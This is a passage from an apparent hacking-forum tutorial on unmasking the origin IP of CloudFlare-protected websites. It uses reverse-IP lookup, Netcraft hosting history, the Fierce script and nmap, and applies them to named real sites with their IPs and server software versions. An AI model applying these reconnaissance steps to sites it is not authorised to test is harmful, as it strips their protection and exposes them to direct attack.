Lets reverse this ip and see where it leads us
to.
Code:
Found 21 domains hosted on the same
web server as 174.120.63.195.
We can see that emillionareforum.com is
located on this IP.This is the real IP of
emillionareforum.
2-NetCraft Toolbar (Hosting History)
In Some Cases we can also use netcraft
toolbar.Here we gonna take ubers.org as an
example.
Code:
Code:
http://toolbar.netcraft.com/
site_report?url=http://www.ubers.org
It will only work if the site is old and has
recently changed to CloudFlare.It is meant to
see the "Hosting History" of the scanned site.
Code:
Hosting HistoryNetblock Owner    IP
address    OS    Web Server    Last
changed
AltusHost
Inc.    79.142.78.77    Linux    Apache/2.2.21
Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-
fips-rhel5 mod_auth_passthrough/2.1
mod_bwlimited/1.4
FrontPage/5.0.2.2635    11-Feb-2012
AltusHost
Inc.    79.142.78.79    Linux    Apache    19-
Jan-2012
AltusHost
Inc.    79.142.78.79    Linux    Apache/2.2.21
Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-
fips-rhel5 mod_auth_passthrough/2.1
mod_bwlimited/1.4
FrontPage/5.0.2.2635 mod_perl/2.0.5
Perl/v5.8.8    7-Jan-2012
AltusHost
Inc.    31.3.153.133    Linux    Apache/2.2.21
Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-
fips-rhel5 mod_bwlimited/1.4
PHP/5.3.8    3-Jan-2012
AltusHost
Inc.    31.3.153.133    Linux    Apache/2.2.21
Unix mod_ssl/2.2.21 OpenSSL/0.9.8e-
fips-rhel5 mod_bwlimited/1.4
PHP/5.3.8    23-Dec-2011
AltusHost
Inc.    128.127.110.38    Linux    LiteSpeed    19-
Dec-2011
AltusHost
Inc.    128.127.110.38    Linux    LiteSpeed    2-
Dec-2011
3- Using Fierce v0.9.9
We can also use Fierce v0.9.9 perl script.It
wont work everytime but it is worth trying.For
more details please check this thread.
Code:
https://blackhats.net/0x0/
showthread.php?
tid=406&pid=1489#pid1489
4-Nmaping-Hosts
This method i came across while searching
but i didn't test personally.
For more details read this thread.
Code:
http://calderonpale.com/blog/
nmaping-hosts-behind-cloudflares-
service
I hope you enjoyed reading it.